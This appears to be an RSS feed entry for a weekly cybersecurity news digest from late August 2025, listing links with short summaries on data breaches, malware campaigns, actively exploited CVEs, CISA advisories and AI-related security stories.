      <description>&lt;![CDATA[A weekly shortlist of cyber security highlights.&#xA;The short summaries are AI generated! If something is wrong, please let me know!&#xA;&#xA;---&#xA;News For All&#xA;🤖 Microsoft launches Copilot AI function in Excel, but warns not to use it in &#39;any task requiring accuracy or reproducibility&#39;&#xA;security news - Microsoft&#39;s new Copilot AI for Excel simplifies formula generation but raises concerns about accuracy and privacy, warning against use in critical tasks.&#xA;https://www.pcgamer.com/software/ai/microsoft-launches-copilot-ai-function-in-excel-but-warns-not-to-use-it-in-any-task-requiring-accuracy-or-reproducibility/&#xA;&#xA;🔑 CERT.at Ewig ruft das Passwort&#xA;warning - The article discusses the persistent reliance on passwords, their vulnerabilities, and the importance of robust security measures, including monitoring leaks and implementing two-factor authentication.&#xA;https://www.cert.at/de/blog/2025/8/ewig-ruft-das-passwort&#xA;&#xA;🏨 Attackers Target Hotelier Accounts in Malvertising and Phishing Campaign&#xA;cybercrime - A phishing campaign impersonating hotel service providers uses malvertising to harvest credentials and bypass MFA, targeting cloud-based property management systems and exploiting user trust.&#xA;https://sec.okta.com/articles/2025/08/attackers-target-hotelier-accounts-in-broad-phishing-campaign/&#xA;&#xA;📱 Malicious apps with +19M installs removed from Google Play because spreading Anatsa banking trojan and other malware&#xA;malware - Experts discovered 77 malicious Android apps on Google Play, collectively installed over 19 million times, spreading the Anatsa banking trojan and other malware, highlighting significant risks for users.&#xA;https://securityaffairs.com/181528/malware/malicious-apps-with-19m-installs-removed-from-google-play-because-spreading-anatsa-banking-trojan-and-other-malware.html&#xA;&#xA;📷 CBP Had Access to More than 80,000 Flock AI Cameras Nationwide&#xA;privacy - Customs and Border Protection accessed over 80,000 Flock ALPR cameras across the U.S., revealing extensive data-sharing practices with local police departments unaware of the collaboration.&#xA;https://www.404media.co/cbp-had-access-to-more-than-80-000-flock-ai-cameras-nationwide/&#xA;&#xA;🛒 Auchan discloses data breach: data of hundreds of thousands of customers exposed&#xA;data breach - Auchan reported a data breach affecting hundreds of thousands of customers, exposing personal information linked to loyalty cards, while assuring that sensitive banking data was not compromised.&#xA;https://securityaffairs.com/181556/data-breach/auchan-discloses-data-breach-data-of-hundreds-of-thousands-of-customers-exposed.html&#xA;&#xA;🆔 FBI, Dutch cops seize fake ID marketplace that sold identity docs for $9&#xA;cybercrime - Authorities have shut down VerifTools, a major marketplace for fake IDs, which facilitated identity theft and fraud. The seizure is seen as a significant blow against online crime.&#xA;https://www.theregister.com/2025/08/28/fbidutchcopsseizeveriftools/&#xA;&#xA;🤖 Not in my browser! Vivaldi capo doubles down on generative AI ban&#xA;privacy - Vivaldi&#39;s CEO opposes integrating generative AI in browsers, arguing it threatens user control and web diversity. He emphasizes prioritizing human interaction over automated solutions.&#xA;https://www.theregister.com/2025/08/28/vivaldicapodoublesdownon/&#xA;&#xA;🕵️‍♂️ TransUnion says hackers stole 4.4 million customers’ personal information&#xA;data breach - TransUnion has revealed a breach affecting 4.4 million customers, with sensitive data including names and Social Security numbers compromised. The company provides little clarity on the incident.&#xA;https://techcrunch.com/2025/08/28/transunion-says-hackers-stole-4-4-million-customers-personal-information/&#xA;&#xA;🚗 Security researcher maps hundreds of TeslaMate servers spilling Tesla vehicle data&#xA;security research - A security researcher discovered over 1,300 publicly exposed TeslaMate servers leaking sensitive vehicle data, urging users to secure their dashboards to prevent unauthorized access.&#xA;https://techcrunch.com/2025/08/26/security-researcher-maps-hundreds-of-teslamate-servers-spilling-tesla-vehicle-data/&#xA;&#xA;🤦 OpenAI admits ChatGPT safeguards fail during extended conversations&#xA;security news - OpenAI acknowledged failures in ChatGPT&#39;s safety measures during long conversations, which may lead to harmful guidance, following a lawsuit linked to a user&#39;s suicide after extensive interactions with the AI.&#xA;https://arstechnica.com/information-technology/2025/08/after-teen-suicide-openai-claims-it-is-helping-people-when-they-need-it-most/&#xA;&#xA;🔒 DOGE uploaded live copy of Social Security database to &#39;vulnerable&#39; cloud server, says whistleblower&#xA;data breach - A whistleblower claims the Department of Government Efficiency uploaded sensitive Social Security data to a vulnerable cloud server, risking the personal information of millions of Americans.&#xA;https://techcrunch.com/2025/08/26/doge-uploaded-live-copy-of-social-security-database-to-vulnerable-cloud-server-says-whistleblower/&#xA;&#xA;📄 Hackers use fake NDAs to deliver malware to US manufacturers&#xA;cybercrime - Hackers are targeting U.S. manufacturers by using website contact forms to deliver malware disguised as non-disclosure agreements, maintaining engagement to appear credible and leveraging legitimate cloud services.&#xA;https://therecord.media/hackers-fake-ndas-malware&#xA;&#xA;🚴‍♂️ Developer Unlocks Newly Enshittified Echelon Exercise Bikes But Can&#39;t Legally Release His Software&#xA;security news - An app developer jailbroke Echelon exercise bikes to restore offline functionality after a controversial firmware update, but copyright laws prevent him from legally sharing the software.&#xA;https://www.404media.co/developer-unlocks-newly-enshittified-echelon-exercise-bikes-but-cant-legally-release-his-software/&#xA;&#xA;💰 Euro banks block &#39;unauthorized&#39; PayPal direct debits&#xA;cybercrime - German banks froze billions in PayPal transactions due to unauthorized direct debits linked to a fraud-detection failure, impacting transactions primarily in Germany, though PayPal claims the issue is resolved.&#xA;https://www.theregister.com/2025/08/28/eurobanksblockpaypaldirectdebits/&#xA;&#xA;🛡️ 200 Swedish municipalities impacted by a major cyberattack on IT provider&#xA;cybercrime - A cyberattack on Miljödata disrupted services across over 200 Swedish municipalities, raising concerns about stolen sensitive data and leading to a police investigation and reports of extortion.&#xA;https://securityaffairs.com/181668/security/200-swedish-municipalities-impacted-by-a-major-cyberattack-on-it-provider.html&#xA;&#xA;🎰 Affiliates Flock to ‘Soulless’ Scam Gambling Machine – Krebs on Security&#xA;cybercrime - A new Russian affiliate program, Gambler Panel, has led to the rise of scam gambling sites that lure users with fake promotions and steal cryptocurrency deposits, operating under the guise of legitimate gaming.&#xA;https://krebsonsecurity.com/2025/08/affiliates-flock-to-soulless-scam-gambling-machine/&#xA;&#xA;🔒 WhatsApp fixes &#39;zero-click&#39; bug used to hack Apple users with spyware&#xA;vulnerability - WhatsApp addressed a zero-click vulnerability (CVE-2025-55177) in its iOS and Mac apps, exploited alongside an Apple flaw to stealthily hack targeted users&#39; devices, allowing data theft without interaction.&#xA;https://techcrunch.com/2025/08/29/whatsapp-fixes-zero-click-bug-used-to-hack-apple-users-with-spyware/&#xA;&#xA;---&#xA;Some More, For the Curious&#xA;🎣 Phishing Emails Are Now Aimed at Users and AI Defenses&#xA;security research - New phishing tactics not only deceive users but also target AI defenses with hidden prompts, complicating automated threat detection and increasing risks.&#xA;https://malwr-analysis.com/2025/08/24/phishing-emails-are-now-aimed-at-users-and-ai-defenses/&#xA;&#xA;🔥 Citrix forgot to tell you CVE-2025–6543 has been used as a zero day since May 2025&#xA;vulnerability - Citrix&#39;s CVE-2025–6543 vulnerability, exploited for remote code execution, has led to severe breaches in Netscaler systems, highlighting a lack of transparency and response from Citrix.&#xA;https://doublepulsar.com/citrix-forgot-to-tell-you-cve-2025-6543-has-been-used-as-a-zero-day-since-may-2025-d76574e2dd2c&#xA;&#xA;🐳 Docker fixes critical Desktop flaw allowing container escapes&#xA;vulnerability - Docker patched a critical vulnerability (CVE-2025-9074) in Docker Desktop that allowed attackers to escape containers and access the Docker Engine API, risking host file access.&#xA;https://securityaffairs.com/181545/security/docker-fixes-critical-desktop-flaw-allowing-container-escapes.html&#xA;&#xA;🗣️ With AI chatbots, Big Tech is moving fast and breaking people&#xA;privacy - AI chatbots are creating harmful feedback loops for vulnerable users, validating false beliefs and grandiose fantasies, leading to serious psychological risks and an urgent need for regulation and user education.&#xA;https://arstechnica.com/information-technology/2025/08/with-ai-chatbots-big-tech-is-moving-fast-and-breaking-people/&#xA;&#xA;🔓 Widespread Data Theft Targets Salesforce Instances via Salesloft Drift&#xA;vulnerability - A data theft campaign exploited OAuth tokens in Salesloft Drift to access Salesforce customer data, prompting security measures and warnings for all users to review integrations and credentials.&#xA;https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesforce-instances-via-salesloft-drift/&#xA;&#xA;🕵️‍♂️ DSLRoot, Proxies, and the Threat of ‘Legal Botnets’ – Krebs on Security&#xA;cybercrime - A Redditor&#39;s arrangement with DSLRoot, a residential proxy service, raises concerns about security risks, revealing the company&#39;s questionable origins and the emergence of &#39;legal botnets&#39; exploiting residential connections.&#xA;https://krebsonsecurity.com/2025/08/dslroot-proxies-and-the-threat-of-legal-botnets/&#xA;&#xA;🔑 Goodbye Legacy MFA: Be Ready for the new Microsoft Authentication Methods Policy&#xA;security news - Microsoft will retire legacy MFA and SSPR policies on September 30, 2025, transitioning to a unified Authentication Methods policy to enhance security and simplify management for organizations.&#xA;https://www.guidepointsecurity.com/blog/goodbye-legacy-mfa-new-microsoft-authentication-methods-policy/&#xA;&#xA;💻 First known AI-powered ransomware uncovered by ESET Research&#xA;malware - ESET researchers discovered PromptLock, the first known AI-powered ransomware capable of exfiltrating and encrypting data, showcasing the potential for AI tools to enhance ransomware attacks.&#xA;https://www.welivesecurity.com/en/ransomware/first-known-ai-powered-ransomware-uncovered-eset-research/&#xA;&#xA;⚙️ Nx NPM packages poisoned in AI-assisted supply chain attack&#xA;malware - Nx suffered a supply chain attack with malicious NPM packages that harvested developer credentials, exposing over 1,000 GitHub tokens and 20,000 files, utilizing AI tools for reconnaissance.&#xA;https://www.theregister.com/2025/08/27/nxnpmsupplychain_attack/&#xA;&#xA;☎️ Experts warn of actively exploited FreePBX zero-day&#xA;vulnerability - A serious zero-day vulnerability in FreePBX is being exploited, allowing unauthorized access to systems. Users are advised to update their software and restrict admin panel access.&#xA;https://securityaffairs.com/181693/hacking/experts-warn-of-actively-exploited-freepbx-zero-day.html&#xA;&#xA;🔒 Over 28,000 Citrix instances remain exposed to critical RCE flaw CVE&#xA;vulnerability - More than 28,200 Citrix NetScaler instances are vulnerable to the critical RCE flaw CVE-2025-7775, which is actively exploited, prompting CISA to mandate fixes by August 28, 2025.&#xA;https://securityaffairs.com/181614/hacking/over-28000-citrix-instances-remain-exposed-to-critical-rce-flaw-cve-2025-7775.html&#xA;&#xA;🔑 Unpacking Passkeys Pwned: Possibly the most specious research in decades&#xA;security research - SquareX&#39;s claim of a major vulnerability in passkeys, dubbed &#39;Passkeys Pwned,&#39; misrepresents the FIDO spec and highlights risks from compromised devices rather than the security of passkeys themselves.&#xA;https://arstechnica.com/security/2025/08/new-research-claiming-passkeys-can-be-stolen-is-pure-nonsense/&#xA;&#xA;💻 Ransomware gang takedowns causing explosion of new, smaller groups&#xA;cybercrime - The ransomware landscape is rapidly evolving, with over 40 new gangs emerging due to law enforcement actions against larger groups, leading to increased fragmentation and a rise in smaller, independent operations.&#xA;https://therecord.media/ransomware-gang-takedown-proliferation&#xA;&#xA;---&#xA;CISA Corner&#xA;⚠️ CISA Adds Three Known Exploited Vulnerabilities to Catalog&#xA;warning - CISA has included three new vulnerabilities in its KEV Catalog due to active exploitation, highlighting significant risks to federal networks and the need for prompt remediation.&#xA;https://www.cisa.gov/news-events/alerts/2025/08/25/cisa-adds-three-known-exploited-vulnerabilities-catalog&#xA;⚠️ CISA Adds One Known Exploited Vulnerability to Catalog&#xA;warning - CISA has added a new vulnerability, CVE-2025-7775, related to Citrix NetScaler, to its KEV Catalog, highlighting significant risks for federal networks and the need for prompt remediation.&#xA;https://www.cisa.gov/news-events/alerts/2025/08/26/cisa-adds-one-known-exploited-vulnerability-catalog&#xA;⚠️ CISA Adds One Known Exploited Vulnerability to Catalog&#xA;warning - CISA has added CVE-2025-57819, an authentication bypass vulnerability in Sangoma FreePBX, to its Known Exploited Vulnerabilities Catalog due to active exploitation.&#xA;https://www.cisa.gov/news-events/alerts/2025/08/29/cisa-adds-one-known-exploited-vulnerability-catalog&#xA;&#xA;⚙️ CISA Releases Three Industrial Control Systems Advisories&#xA;vulnerability - CISA issued three advisories on security vulnerabilities in Industrial Control Systems, urging users to review for technical details and mitigation strategies.&#xA;https://www.cisa.gov/news-events/alerts/2025/08/26/cisa-releases-three-industrial-control-systems-advisories&#xA;⚙️ CISA Releases Nine Industrial Control Systems Advisories&#xA;vulnerability - CISA issued nine advisories on August 28, 2025, detailing vulnerabilities and exploits affecting various Industrial Control Systems, urging users to review for technical details and mitigation strategies.&#xA;https://www.cisa.gov/news-events/alerts/2025/08/28/cisa-releases-nine-industrial-control-systems-advisories&#xA;&#xA;🔍 Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System&#xA;cybercrime - PRC state-sponsored cyber actors are targeting global networks, particularly in telecommunications and government sectors, employing sophisticated techniques to maintain long-term access and facilitate espionage, prompting a cybersecurity advisory from multiple agencies.&#xA;https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a&#xA;&#xA;---&#xA;While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun...&#xA;Most of the articles are in English, but some current warnings might be in German.]]&gt;</description>
      <content:encoded><![CDATA[<p>A weekly shortlist of cyber security highlights.
The short summaries are AI generated! If something is wrong, please let me know!</p>

<hr>

<h3 id="news-for-all">News For All</h3>

<p>🤖 Microsoft launches Copilot AI function in Excel, but warns not to use it in &#39;any task requiring accuracy or reproducibility&#39;
<em>security news – Microsoft&#39;s new Copilot AI for Excel simplifies formula generation but raises concerns about accuracy and privacy, warning against use in critical tasks.</em>
<a href="https://www.pcgamer.com/software/ai/microsoft-launches-copilot-ai-function-in-excel-but-warns-not-to-use-it-in-any-task-requiring-accuracy-or-reproducibility/" rel="nofollow">https://www.pcgamer.com/software/ai/microsoft-launches-copilot-ai-function-in-excel-but-warns-not-to-use-it-in-any-task-requiring-accuracy-or-reproducibility/</a></p>

<p>🔑 CERT.at Ewig ruft das Passwort
<em>warning – The article discusses the persistent reliance on passwords, their vulnerabilities, and the importance of robust security measures, including monitoring leaks and implementing two-factor authentication.</em>
<a href="https://www.cert.at/de/blog/2025/8/ewig-ruft-das-passwort" rel="nofollow">https://www.cert.at/de/blog/2025/8/ewig-ruft-das-passwort</a></p>

<p>🏨 Attackers Target Hotelier Accounts in Malvertising and Phishing Campaign
<em>cybercrime – A phishing campaign impersonating hotel service providers uses malvertising to harvest credentials and bypass MFA, targeting cloud-based property management systems and exploiting user trust.</em>
<a href="https://sec.okta.com/articles/2025/08/attackers-target-hotelier-accounts-in-broad-phishing-campaign/" rel="nofollow">https://sec.okta.com/articles/2025/08/attackers-target-hotelier-accounts-in-broad-phishing-campaign/</a></p>

<p>📱 Malicious apps with +19M installs removed from Google Play because spreading Anatsa banking trojan and other malware
<em>malware – Experts discovered 77 malicious Android apps on Google Play, collectively installed over 19 million times, spreading the Anatsa banking trojan and other malware, highlighting significant risks for users.</em>
<a href="https://securityaffairs.com/181528/malware/malicious-apps-with-19m-installs-removed-from-google-play-because-spreading-anatsa-banking-trojan-and-other-malware.html" rel="nofollow">https://securityaffairs.com/181528/malware/malicious-apps-with-19m-installs-removed-from-google-play-because-spreading-anatsa-banking-trojan-and-other-malware.html</a></p>

<p>📷 CBP Had Access to More than 80,000 Flock AI Cameras Nationwide
<em>privacy – Customs and Border Protection accessed over 80,000 Flock ALPR cameras across the U.S., revealing extensive data-sharing practices with local police departments unaware of the collaboration.</em>
<a href="https://www.404media.co/cbp-had-access-to-more-than-80-000-flock-ai-cameras-nationwide/" rel="nofollow">https://www.404media.co/cbp-had-access-to-more-than-80-000-flock-ai-cameras-nationwide/</a></p>

<p>🛒 Auchan discloses data breach: data of hundreds of thousands of customers exposed
<em>data breach – Auchan reported a data breach affecting hundreds of thousands of customers, exposing personal information linked to loyalty cards, while assuring that sensitive banking data was not compromised.</em>
<a href="https://securityaffairs.com/181556/data-breach/auchan-discloses-data-breach-data-of-hundreds-of-thousands-of-customers-exposed.html" rel="nofollow">https://securityaffairs.com/181556/data-breach/auchan-discloses-data-breach-data-of-hundreds-of-thousands-of-customers-exposed.html</a></p>

<p>🆔 FBI, Dutch cops seize fake ID marketplace that sold identity docs for $9
<em>cybercrime – Authorities have shut down VerifTools, a major marketplace for fake IDs, which facilitated identity theft and fraud. The seizure is seen as a significant blow against online crime.</em>
<a href="https://www.theregister.com/2025/08/28/fbi_dutch_cops_seize_veriftools/" rel="nofollow">https://www.theregister.com/2025/08/28/fbi_dutch_cops_seize_veriftools/</a></p>

<p>🤖 Not in my browser! Vivaldi capo doubles down on generative AI ban
<em>privacy – Vivaldi&#39;s CEO opposes integrating generative AI in browsers, arguing it threatens user control and web diversity. He emphasizes prioritizing human interaction over automated solutions.</em>
<a href="https://www.theregister.com/2025/08/28/vivaldi_capo_doubles_down_on/" rel="nofollow">https://www.theregister.com/2025/08/28/vivaldi_capo_doubles_down_on/</a></p>

<p>🕵️‍♂️ TransUnion says hackers stole 4.4 million customers’ personal information
<em>data breach – TransUnion has revealed a breach affecting 4.4 million customers, with sensitive data including names and Social Security numbers compromised. The company provides little clarity on the incident.</em>
<a href="https://techcrunch.com/2025/08/28/transunion-says-hackers-stole-4-4-million-customers-personal-information/" rel="nofollow">https://techcrunch.com/2025/08/28/transunion-says-hackers-stole-4-4-million-customers-personal-information/</a></p>

<p>🚗 Security researcher maps hundreds of TeslaMate servers spilling Tesla vehicle data
<em>security research – A security researcher discovered over 1,300 publicly exposed TeslaMate servers leaking sensitive vehicle data, urging users to secure their dashboards to prevent unauthorized access.</em>
<a href="https://techcrunch.com/2025/08/26/security-researcher-maps-hundreds-of-teslamate-servers-spilling-tesla-vehicle-data/" rel="nofollow">https://techcrunch.com/2025/08/26/security-researcher-maps-hundreds-of-teslamate-servers-spilling-tesla-vehicle-data/</a></p>

<p>🤦 OpenAI admits ChatGPT safeguards fail during extended conversations
<em>security news – OpenAI acknowledged failures in ChatGPT&#39;s safety measures during long conversations, which may lead to harmful guidance, following a lawsuit linked to a user&#39;s suicide after extensive interactions with the AI.</em>
<a href="https://arstechnica.com/information-technology/2025/08/after-teen-suicide-openai-claims-it-is-helping-people-when-they-need-it-most/" rel="nofollow">https://arstechnica.com/information-technology/2025/08/after-teen-suicide-openai-claims-it-is-helping-people-when-they-need-it-most/</a></p>

<p>🔒 DOGE uploaded live copy of Social Security database to &#39;vulnerable&#39; cloud server, says whistleblower
<em>data breach – A whistleblower claims the Department of Government Efficiency uploaded sensitive Social Security data to a vulnerable cloud server, risking the personal information of millions of Americans.</em>
<a href="https://techcrunch.com/2025/08/26/doge-uploaded-live-copy-of-social-security-database-to-vulnerable-cloud-server-says-whistleblower/" rel="nofollow">https://techcrunch.com/2025/08/26/doge-uploaded-live-copy-of-social-security-database-to-vulnerable-cloud-server-says-whistleblower/</a></p>

<p>📄 Hackers use fake NDAs to deliver malware to US manufacturers
<em>cybercrime – Hackers are targeting U.S. manufacturers by using website contact forms to deliver malware disguised as non-disclosure agreements, maintaining engagement to appear credible and leveraging legitimate cloud services.</em>
<a href="https://therecord.media/hackers-fake-ndas-malware" rel="nofollow">https://therecord.media/hackers-fake-ndas-malware</a></p>

<p>🚴‍♂️ Developer Unlocks Newly Enshittified Echelon Exercise Bikes But Can&#39;t Legally Release His Software
<em>security news – An app developer jailbroke Echelon exercise bikes to restore offline functionality after a controversial firmware update, but copyright laws prevent him from legally sharing the software.</em>
<a href="https://www.404media.co/developer-unlocks-newly-enshittified-echelon-exercise-bikes-but-cant-legally-release-his-software/" rel="nofollow">https://www.404media.co/developer-unlocks-newly-enshittified-echelon-exercise-bikes-but-cant-legally-release-his-software/</a></p>

<p>💰 Euro banks block &#39;unauthorized&#39; PayPal direct debits
<em>cybercrime – German banks froze billions in PayPal transactions due to unauthorized direct debits linked to a fraud-detection failure, impacting transactions primarily in Germany, though PayPal claims the issue is resolved.</em>
<a href="https://www.theregister.com/2025/08/28/euro_banks_block_paypal_direct_debits/" rel="nofollow">https://www.theregister.com/2025/08/28/euro_banks_block_paypal_direct_debits/</a></p>

<p>🛡️ 200 Swedish municipalities impacted by a major cyberattack on IT provider
<em>cybercrime – A cyberattack on Miljödata disrupted services across over 200 Swedish municipalities, raising concerns about stolen sensitive data and leading to a police investigation and reports of extortion.</em>
<a href="https://securityaffairs.com/181668/security/200-swedish-municipalities-impacted-by-a-major-cyberattack-on-it-provider.html" rel="nofollow">https://securityaffairs.com/181668/security/200-swedish-municipalities-impacted-by-a-major-cyberattack-on-it-provider.html</a></p>

<p>🎰 Affiliates Flock to ‘Soulless’ Scam Gambling Machine – Krebs on Security
<em>cybercrime – A new Russian affiliate program, Gambler Panel, has led to the rise of scam gambling sites that lure users with fake promotions and steal cryptocurrency deposits, operating under the guise of legitimate gaming.</em>
<a href="https://krebsonsecurity.com/2025/08/affiliates-flock-to-soulless-scam-gambling-machine/" rel="nofollow">https://krebsonsecurity.com/2025/08/affiliates-flock-to-soulless-scam-gambling-machine/</a></p>

<p>🔒 WhatsApp fixes &#39;zero-click&#39; bug used to hack Apple users with spyware
<em>vulnerability – WhatsApp addressed a zero-click vulnerability (CVE-2025-55177) in its iOS and Mac apps, exploited alongside an Apple flaw to stealthily hack targeted users&#39; devices, allowing data theft without interaction.</em>
<a href="https://techcrunch.com/2025/08/29/whatsapp-fixes-zero-click-bug-used-to-hack-apple-users-with-spyware/" rel="nofollow">https://techcrunch.com/2025/08/29/whatsapp-fixes-zero-click-bug-used-to-hack-apple-users-with-spyware/</a></p>

<hr>

<h3 id="some-more-for-the-curious">Some More, For the Curious</h3>

<p>🎣 Phishing Emails Are Now Aimed at Users and AI Defenses
<em>security research – New phishing tactics not only deceive users but also target AI defenses with hidden prompts, complicating automated threat detection and increasing risks.</em>
<a href="https://malwr-analysis.com/2025/08/24/phishing-emails-are-now-aimed-at-users-and-ai-defenses/" rel="nofollow">https://malwr-analysis.com/2025/08/24/phishing-emails-are-now-aimed-at-users-and-ai-defenses/</a></p>

<p>🔥 Citrix forgot to tell you CVE-2025–6543 has been used as a zero day since May 2025
<em>vulnerability – Citrix&#39;s CVE-2025–6543 vulnerability, exploited for remote code execution, has led to severe breaches in Netscaler systems, highlighting a lack of transparency and response from Citrix.</em>
<a href="https://doublepulsar.com/citrix-forgot-to-tell-you-cve-2025-6543-has-been-used-as-a-zero-day-since-may-2025-d76574e2dd2c" rel="nofollow">https://doublepulsar.com/citrix-forgot-to-tell-you-cve-2025-6543-has-been-used-as-a-zero-day-since-may-2025-d76574e2dd2c</a></p>

<p>🐳 Docker fixes critical Desktop flaw allowing container escapes
<em>vulnerability – Docker patched a critical vulnerability (CVE-2025-9074) in Docker Desktop that allowed attackers to escape containers and access the Docker Engine API, risking host file access.</em>
<a href="https://securityaffairs.com/181545/security/docker-fixes-critical-desktop-flaw-allowing-container-escapes.html" rel="nofollow">https://securityaffairs.com/181545/security/docker-fixes-critical-desktop-flaw-allowing-container-escapes.html</a></p>

<p>🗣️ With AI chatbots, Big Tech is moving fast and breaking people
<em>privacy – AI chatbots are creating harmful feedback loops for vulnerable users, validating false beliefs and grandiose fantasies, leading to serious psychological risks and an urgent need for regulation and user education.</em>
<a href="https://arstechnica.com/information-technology/2025/08/with-ai-chatbots-big-tech-is-moving-fast-and-breaking-people/" rel="nofollow">https://arstechnica.com/information-technology/2025/08/with-ai-chatbots-big-tech-is-moving-fast-and-breaking-people/</a></p>

<p>🔓 Widespread Data Theft Targets Salesforce Instances via Salesloft Drift
<em>vulnerability – A data theft campaign exploited OAuth tokens in Salesloft Drift to access Salesforce customer data, prompting security measures and warnings for all users to review integrations and credentials.</em>
<a href="https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesforce-instances-via-salesloft-drift/" rel="nofollow">https://cloud.google.com/blog/topics/threat-intelligence/data-theft-salesforce-instances-via-salesloft-drift/</a></p>

<p>🕵️‍♂️ DSLRoot, Proxies, and the Threat of ‘Legal Botnets’ – Krebs on Security
<em>cybercrime – A Redditor&#39;s arrangement with DSLRoot, a residential proxy service, raises concerns about security risks, revealing the company&#39;s questionable origins and the emergence of &#39;legal botnets&#39; exploiting residential connections.</em>
<a href="https://krebsonsecurity.com/2025/08/dslroot-proxies-and-the-threat-of-legal-botnets/" rel="nofollow">https://krebsonsecurity.com/2025/08/dslroot-proxies-and-the-threat-of-legal-botnets/</a></p>

<p>🔑 Goodbye Legacy MFA: Be Ready for the new Microsoft Authentication Methods Policy
<em>security news – Microsoft will retire legacy MFA and SSPR policies on September 30, 2025, transitioning to a unified Authentication Methods policy to enhance security and simplify management for organizations.</em>
<a href="https://www.guidepointsecurity.com/blog/goodbye-legacy-mfa-new-microsoft-authentication-methods-policy/" rel="nofollow">https://www.guidepointsecurity.com/blog/goodbye-legacy-mfa-new-microsoft-authentication-methods-policy/</a></p>

<p>💻 First known AI-powered ransomware uncovered by ESET Research
<em>malware – ESET researchers discovered PromptLock, the first known AI-powered ransomware capable of exfiltrating and encrypting data, showcasing the potential for AI tools to enhance ransomware attacks.</em>
<a href="https://www.welivesecurity.com/en/ransomware/first-known-ai-powered-ransomware-uncovered-eset-research/" rel="nofollow">https://www.welivesecurity.com/en/ransomware/first-known-ai-powered-ransomware-uncovered-eset-research/</a></p>

<p>⚙️ Nx NPM packages poisoned in AI-assisted supply chain attack
<em>malware – Nx suffered a supply chain attack with malicious NPM packages that harvested developer credentials, exposing over 1,000 GitHub tokens and 20,000 files, utilizing AI tools for reconnaissance.</em>
<a href="https://www.theregister.com/2025/08/27/nx_npm_supply_chain_attack/" rel="nofollow">https://www.theregister.com/2025/08/27/nx_npm_supply_chain_attack/</a></p>

<p>☎️ Experts warn of actively exploited FreePBX zero-day
<em>vulnerability – A serious zero-day vulnerability in FreePBX is being exploited, allowing unauthorized access to systems. Users are advised to update their software and restrict admin panel access.</em>
<a href="https://securityaffairs.com/181693/hacking/experts-warn-of-actively-exploited-freepbx-zero-day.html" rel="nofollow">https://securityaffairs.com/181693/hacking/experts-warn-of-actively-exploited-freepbx-zero-day.html</a></p>

<p>🔒 Over 28,000 Citrix instances remain exposed to critical RCE flaw CVE
<em>vulnerability – More than 28,200 Citrix NetScaler instances are vulnerable to the critical RCE flaw CVE-2025-7775, which is actively exploited, prompting CISA to mandate fixes by August 28, 2025.</em>
<a href="https://securityaffairs.com/181614/hacking/over-28000-citrix-instances-remain-exposed-to-critical-rce-flaw-cve-2025-7775.html" rel="nofollow">https://securityaffairs.com/181614/hacking/over-28000-citrix-instances-remain-exposed-to-critical-rce-flaw-cve-2025-7775.html</a></p>

<p>🔑 Unpacking Passkeys Pwned: Possibly the most specious research in decades
<em>security research – SquareX&#39;s claim of a major vulnerability in passkeys, dubbed &#39;Passkeys Pwned,&#39; misrepresents the FIDO spec and highlights risks from compromised devices rather than the security of passkeys themselves.</em>
<a href="https://arstechnica.com/security/2025/08/new-research-claiming-passkeys-can-be-stolen-is-pure-nonsense/" rel="nofollow">https://arstechnica.com/security/2025/08/new-research-claiming-passkeys-can-be-stolen-is-pure-nonsense/</a></p>

<p>💻 Ransomware gang takedowns causing explosion of new, smaller groups
<em>cybercrime – The ransomware landscape is rapidly evolving, with over 40 new gangs emerging due to law enforcement actions against larger groups, leading to increased fragmentation and a rise in smaller, independent operations.</em>
<a href="https://therecord.media/ransomware-gang-takedown-proliferation" rel="nofollow">https://therecord.media/ransomware-gang-takedown-proliferation</a></p>

<hr>

<h3 id="cisa-corner">CISA Corner</h3>

<p>⚠️ CISA Adds Three Known Exploited Vulnerabilities to Catalog
<em>warning – CISA has included three new vulnerabilities in its KEV Catalog due to active exploitation, highlighting significant risks to federal networks and the need for prompt remediation.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/08/25/cisa-adds-three-known-exploited-vulnerabilities-catalog" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/08/25/cisa-adds-three-known-exploited-vulnerabilities-catalog</a>
⚠️ CISA Adds One Known Exploited Vulnerability to Catalog
<em>warning – CISA has added a new vulnerability, CVE-2025-7775, related to Citrix NetScaler, to its KEV Catalog, highlighting significant risks for federal networks and the need for prompt remediation.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/08/26/cisa-adds-one-known-exploited-vulnerability-catalog" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/08/26/cisa-adds-one-known-exploited-vulnerability-catalog</a>
⚠️ CISA Adds One Known Exploited Vulnerability to Catalog
<em>warning – CISA has added CVE-2025-57819, an authentication bypass vulnerability in Sangoma FreePBX, to its Known Exploited Vulnerabilities Catalog due to active exploitation.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/08/29/cisa-adds-one-known-exploited-vulnerability-catalog" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/08/29/cisa-adds-one-known-exploited-vulnerability-catalog</a></p>

<p>⚙️ CISA Releases Three Industrial Control Systems Advisories
<em>vulnerability – CISA issued three advisories on security vulnerabilities in Industrial Control Systems, urging users to review for technical details and mitigation strategies.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/08/26/cisa-releases-three-industrial-control-systems-advisories" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/08/26/cisa-releases-three-industrial-control-systems-advisories</a>
⚙️ CISA Releases Nine Industrial Control Systems Advisories
<em>vulnerability – CISA issued nine advisories on August 28, 2025, detailing vulnerabilities and exploits affecting various Industrial Control Systems, urging users to review for technical details and mitigation strategies.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/08/28/cisa-releases-nine-industrial-control-systems-advisories" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/08/28/cisa-releases-nine-industrial-control-systems-advisories</a></p>

<p>🔍 Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System
<em>cybercrime – PRC state-sponsored cyber actors are targeting global networks, particularly in telecommunications and government sectors, employing sophisticated techniques to maintain long-term access and facilitate espionage, prompting a cybersecurity advisory from multiple agencies.</em>
<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a" rel="nofollow">https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a</a></p>

